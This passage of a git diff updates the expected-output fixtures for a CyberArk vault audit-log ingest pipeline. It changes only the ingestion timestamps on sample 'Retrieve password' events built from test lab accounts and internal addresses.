\u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e295\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eadm2\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eWindows\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.6\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e(Action: Show Password)\u003c/Reason\u003e\\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\\n \u003cGeneral\u003e\\n \u003cRetrieveAction\u003eShow Password\u003c/RetrieveAction\u003e\\n \u003c/General\u003e\\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve password\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.2.0.3\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WIN-SERVER-LOCAL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"Administrator2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"dbserver.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"DBServer\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessReconciliation\\\" Value=\\\"1604944215\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"EvilCorp\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"295\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"adm2\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Windows\",\"File\":\"Root\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\",\"Station\":\"10.2.0.6\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"(Action: Show Password)\",\"PvwaDetails\":{\"RetrieveReason\":{\"General\":{\"RetrieveAction\":\"Show Password\"}}},\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"10.2.0.3\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WIN-SERVER-LOCAL\"},{\"Name\":\"UserName\",\"Value\":\"Administrator2\"},{\"Name\":\"Address\",\"Value\":\"dbserver.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"LogonDomain\",\"Value\":\"DBServer\"},{\"Name\":\"SequenceID\",\"Value\":\"1\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessReconciliation\",\"Value\":\"1604944215\"},{\"Name\":\"Customer\",\"Value\":\"EvilCorp\"}]}}}}", "code": "295", "kind": "event", @@ -262,7 +262,7 @@ "event": { "severity": 2, "reason": "testing", - "ingested": "2021-06-09T10:24:30.560341600Z", + "ingested": "2021-12-09T13:36:45.560103300Z", "original": "\u003c5\u003e1 2021-03-08T18:16:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:16:51\",\"IsoTimestamp\":\"2021-03-08T18:16:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\testobject\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"testing\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"test\"},{\"Name\":\"Address\",\"Value\":\"test\"},{\"Name\":\"CPMDisabled\",\"Value\":\"testing\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "295", "kind": "event", @@ -368,7 +368,7 @@ "event": { "severity": 2, "reason": "CPM", - "ingested": "2021-06-09T10:24:30.560350300Z", + "ingested": "2021-12-09T13:36:45.560112Z", "original": "\u003c5\u003e1 2021-03-08T19:19:59Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 11:19:59\",\"IsoTimestamp\":\"2021-03-08T19:19:59Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"CPM\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountA\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ChangeTask\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"SequenceID\",\"Value\":\"26\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"StartChangeNotBefore\",\"Value\":\"1615231182\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1614785704\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"1\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "295", "kind": "event", @@ -454,7 +454,7 @@ "event": { "severity": 2, "reason": "CPM", - "ingested": "2021-06-09T10:24:30.560354200Z", + "ingested": "2021-12-09T13:36:45.560117600Z", "original": "\u003c5\u003e1 2021-03-08T19:20:02Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 11:20:02\",\"IsoTimestamp\":\"2021-03-08T19:20:02Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Groups\\\\WindowsGroup\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"CPM\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WindowsDesktopLocalAccountsRotationalPolicy\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615198782\"},{\"Name\":\"CurrInd\",\"Value\":\"2\"}]}}}}", "code": "295", "kind": "event", @@ -556,7 +556,7 @@ "event": { "severity": 2, "reason": "Application provider background refresh job", - "ingested": "2021-06-09T10:24:30.560357600Z", + "ingested": "2021-12-09T13:36:45.560123100Z", "original": "\u003c5\u003e1 2021-03-10T14:40:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 06:40:37\",\"IsoTimestamp\":\"2021-03-10T14:40:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"Prov_COMPONENTS\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Application provider background refresh job\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountA\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"SequenceID\",\"Value\":\"27\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615231204\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"1\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Active\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "295", "kind": "event", @@ -651,7 +651,7 @@ "event": { "severity": 2, "reason": "test", - "ingested": "2021-06-09T10:24:30.560361Z", + "ingested": "2021-12-09T13:36:45.560128600Z", "original": "\u003c5\u003e1 2021-03-10T18:27:57Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:27:57\",\"IsoTimestamp\":\"2021-03-10T18:27:57Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSMAdmin\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"test\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"UserName\",\"Value\":\"PSMAdminConnect\"},{\"Name\":\"Address\",\"Value\":\"169.254.180.25\"},{\"Name\":\"LogonDomain\",\"Value\":\"VAGRANT-2012-R2\"}]}}}}", "code": "295", "kind": "event", @@ -746,7 +746,7 @@ "event": { "severity": 2, "reason": "test", - "ingested": "2021-06-09T10:24:30.560363700Z", + "ingested": "2021-12-09T13:36:45.560134100Z", "original": "\u003c5\u003e1 2021-03-10T18:28:07Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:28:07\",\"IsoTimestamp\":\"2021-03-10T18:28:07Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSMServer\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"test\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"UserName\",\"Value\":\"PSMConnect\"},{\"Name\":\"Address\",\"Value\":\"169.254.180.25\"},{\"Name\":\"LogonDomain\",\"Value\":\"VAGRANT-2012-R2\"}]}}}}", "code": "295", "kind": "event", @@ -852,7 +852,7 @@ "event": { "severity": 2, "reason": "CPM", - "ingested": "2021-06-09T10:24:30.560366500Z", + "ingested": "2021-12-09T13:36:45.560139700Z", "original": "\u003c5\u003e1 2021-03-10T23:39:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 15:39:22\",\"IsoTimestamp\":\"2021-03-10T23:39:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"CPM\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountB\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ChangeTask\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"SequenceID\",\"Value\":\"24\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"StartChangeNotBefore\",\"Value\":\"1615419536\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1614868762\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"2\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "295", "kind": "event", @@ -938,7 +938,7 @@ "event": { "severity": 2, "reason": "CPM", - "ingested": "2021-06-09T10:24:30.560369200Z", + "ingested": "2021-12-09T13:36:45.560145600Z", "original": "\u003c5\u003e1 2021-03-10T23:39:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 15:39:25\",\"IsoTimestamp\":\"2021-03-10T23:39:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Groups\\\\WindowsGroup\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"CPM\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WindowsDesktopLocalAccountsRotationalPolicy\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615387136\"},{\"Name\":\"CurrInd\",\"Value\":\"1\"}]}}}}", "code": "295", "kind": "event", @@ -1034,7 +1034,7 @@ "event": { "severity": 2, "reason": "lksajdflkasdf", - "ingested": "2021-06-09T10:24:30.560371700Z", + "ingested": "2021-12-09T13:36:45.560151200Z", "original": "\u003c5\u003e1 2021-03-11T16:41:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:41:21\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:41:21Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e295\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMAdmin\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003elksajdflkasdf\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"PSMAdminConnect\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"169.254.180.25\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"VAGRANT-2012-R2\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:41:21\",\"IsoTimestamp\":\"2021-03-11T16:41:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSMAdmin\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"lksajdflkasdf\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"UserName\",\"Value\":\"PSMAdminConnect\"},{\"Name\":\"Address\",\"Value\":\"169.254.180.25\"},{\"Name\":\"LogonDomain\",\"Value\":\"VAGRANT-2012-R2\"}]}}}}", "code": "295", "kind": "event", @@ -1128,7 +1128,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.560374500Z", + "ingested": "2021-12-09T13:36:45.560174600Z", "original": "\u003c5\u003e1 2021-03-11T16:50:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:50:28\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:50:28Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e295\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePVWAAppUser\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMServer\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"PSMConnect\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"169.254.180.25\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"VAGRANT-2012-R2\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:50:28\",\"IsoTimestamp\":\"2021-03-11T16:50:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSMServer\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"UserName\",\"Value\":\"PSMConnect\"},{\"Name\":\"Address\",\"Value\":\"169.254.180.25\"},{\"Name\":\"LogonDomain\",\"Value\":\"VAGRANT-2012-R2\"}]}}}}", "code": "295", "kind": "event", @@ -1222,7 +1222,7 @@ "event": { "severity": 2, "reason": "sdfsdf", - "ingested": "2021-06-09T10:24:30.560376900Z", + "ingested": "2021-12-09T13:36:45.560180100Z", "original": "\u003c5\u003e1 2021-03-11T16:54:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:54:20\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:54:20Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e295\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-centos8-PSMApp_VAGRANT\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003esdfsdf\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"PSMApp_VAGRANT\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"centos8\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:54:20\",\"IsoTimestamp\":\"2021-03-11T16:54:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSH-centos8-PSMApp_VAGRANT\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"sdfsdf\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"PSMApp_VAGRANT\"},{\"Name\":\"Address\",\"Value\":\"centos8\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "295", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-300-psm-connect.log 